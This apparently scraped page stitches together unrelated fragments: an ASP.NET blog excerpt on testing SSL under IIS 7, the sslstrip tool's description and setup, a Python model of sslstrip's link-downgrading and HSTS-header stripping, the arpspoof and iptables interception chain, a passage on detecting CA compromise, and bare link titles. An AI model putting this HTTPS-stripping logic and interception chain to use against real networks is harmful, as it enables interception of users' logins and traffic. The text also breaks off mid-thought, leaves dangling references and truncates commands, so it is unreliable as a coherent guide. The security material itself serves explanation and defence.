
Http


Better, Faster, Easier SSL testing for ASP.NET MVC & WebForms - Ricka on MVC and related Web Technologies. Scott Hanselman (ScottHa) has a great post, Working with SSL at Development Time is easier with IISExpress, but I've got what I think is a better approach. Please weigh in. In this blog entry I'll show you how to test SSL on your ASP.NET MVC & WebForms applications using IIS 7.

You should make sure you have IIS 7 set up on your Windows 7 computer before proceeding. See my blog Test your ASP.NET MVC or WebForms Application on IIS 7 in 30 seconds for instructions. Create a new ASP.NET MVC 3 Application called MvcSSL in the C:\Webs folder, accepting all the defaults. WARNING: IIS cannot run an ASP.NET project that has been created in the default Visual Studio project folder (C:\users\<user>\Documents\Visual Studio 2010\Projects). Build and run the application. Right-click the project, select Properties, then select Web in the left pane. Should you get the message "Unable to create the virtual directory", read it and follow the directions and you'll be rewarded with a friendlier message. That's it. Next Steps. If you bind the site to a self-signed certificate, expect a browser warning, because no trusted CA issued it; that warning is normal for local testing and is not a reason to install the development certificate into the machine's Trusted Root store.

Software >> sslstrip. This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links.
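The link-rewriting step the sslstrip description above refers to, as an added illustration that is not sslstrip's own code: a small model that downgrades https:// links and Location redirects in a captured response to http://, strips the HSTS header, and keeps the "secure links" table needed to re-upgrade the victim's requests on the way to the origin. The sample HTML, the example-shop.test and example-bank.test hostnames and the HSTS_PRELOAD set are constructed for the example; ARP spoofing and the port redirect are out of scope, so this is a pure transform over strings rather than a proxy.

```python
"""
Toy model of sslstrip's rewriting step (added illustration, not sslstrip's
own code). It operates on captured HTTP text and keeps the "secure links"
table sslstrip uses to re-upgrade requests on the way out. ARP spoofing and
the iptables redirect are out of scope, so this is a pure function over
strings rather than a proxy.
"""
import re
from urllib.parse import urlsplit

# Constructed sample response body as the origin served it over HTTPS.
SAMPLE_HTML = """<html><body>
<a href="https://example-shop.test/login">Log in</a>
<a href="http://example-shop.test/about">About</a>
<form action="https://example-shop.test/checkout/pay" method="post"></form>
</body></html>"""

# Hosts with a preloaded HSTS entry (constructed list; browsers ship a large
# real one). A browser will not send plain HTTP to these, so stripping fails.
HSTS_PRELOAD = {"example-bank.test"}

# An absolute https:// URL: host, then an optional path up to a delimiter.
HTTPS_LINK = re.compile(r'''https://([A-Za-z0-9.\-]+)(/[^\s"'<>]*)?''')


class SslStripper:
    def __init__(self):
        # URL the victim sees (http://) -> URL the origin expects (https://)
        self.secure_links = {}

    def strip_body(self, body):
        """Rewrite every https:// link to http:// and remember the mapping."""
        def downgrade(m):
            host, path = m.group(1), m.group(2) or ""
            stripped = "http://" + host + path
            self.secure_links[stripped] = m.group(0)
            return stripped
        return HTTPS_LINK.sub(downgrade, body)

    def strip_headers(self, headers):
        """Downgrade a Location: redirect and drop the HSTS header."""
        out = dict(headers)
        if out.get("Location", "").startswith("https://"):
            out["Location"] = self.strip_body(out["Location"])
        # If this header reached the victim, the browser would remember the
        # host as HTTPS-only and later requests would bypass the attacker.
        out.pop("Strict-Transport-Security", None)
        return out

    def upstream_url(self, victim_url):
        """When the victim follows a stripped link, fetch the real https URL."""
        return self.secure_links.get(victim_url, victim_url)


def strippable(victim_url, preload=HSTS_PRELOAD):
    """False when the browser already knows this host is HTTPS-only."""
    host = (urlsplit(victim_url).hostname or "").lower()
    return not any(host == h or host.endswith("." + h) for h in preload)


def demo():
    """Run the transform over the constructed sample; returns the results."""
    s = SslStripper()
    body = s.strip_body(SAMPLE_HTML)
    hdrs = s.strip_headers({"Location": "https://example-shop.test/account",
                            "Strict-Transport-Security": "max-age=31536000"})
    return body, hdrs, dict(s.secure_links)


if __name__ == "__main__":
    body, hdrs, links = demo()
    print(body)
    print(hdrs)
    for victim, real in links.items():
        print(victim, "->", real)
```

The real tool does this rewriting inside a Twisted proxy on the live byte stream; the model above keeps only the transform and the mapping table. The `strippable` check is the practitioner's caveat: once a browser has an HSTS entry for a host, preloaded or learned from a previous clean visit, it never issues the plain-HTTP request the attack depends on.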

It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.

Requirements: Python >= 2.5 (apt-get install python) and the Python "twisted-web" module (apt-get install python-twisted-web). Setup: tar zxvf sslstrip-0.9.tar.gz, then cd sslstrip-0.9, then (optional) sudo python . Running sslstrip: That should do it.

How does this work? First, arpspoof convinces a host that our MAC address is the router's MAC address, and the target begins to send us all its network traffic. Once iptables has redirected the victim's port-80 traffic to sslstrip's listening port, sslstrip receives the traffic and does its magic. The attack only works while the browser is still willing to speak plain HTTP to the site: a host the browser already knows as HTTPS-only through HTTP Strict Transport Security (HSTS) is never downgraded. Development: the current development branch can be found on github.

Detecting Certificate Authority compromises and web browser collusion. Thanks to Ian Gallagher, Seth Schoen, Jesse Burns, Chris Palmer, and other anonymous birds for their invaluable feedback on this writeup. The Tor Project has long understood that the certification authority (CA) model of trust on the internet is susceptible to various methods of compromise. Without strong anonymity, the ability to perform targeted attacks with the blessing of a CA key is serious. In the past, I've worked on attacks relating to SSL/TLS trust models and for quite some time, I've hunted for evidence of non-academic CA compromise in the wild. I've also looked for special kinds of cooperation between CAs and browsers. Proof of collusion will give us facts. It will also give us a real understanding of the faith placed in the strength of the underlying systems. Does certificate revocation really work? I watch the Chromium and Mozilla Firefox projects carefully, because they are so important to the internet infrastructure.

A comment marks the first as "Not a real certificate."

HTTP Web Services - Dive Into Python 3.

Httplib2 - Project Hosting on Google Code.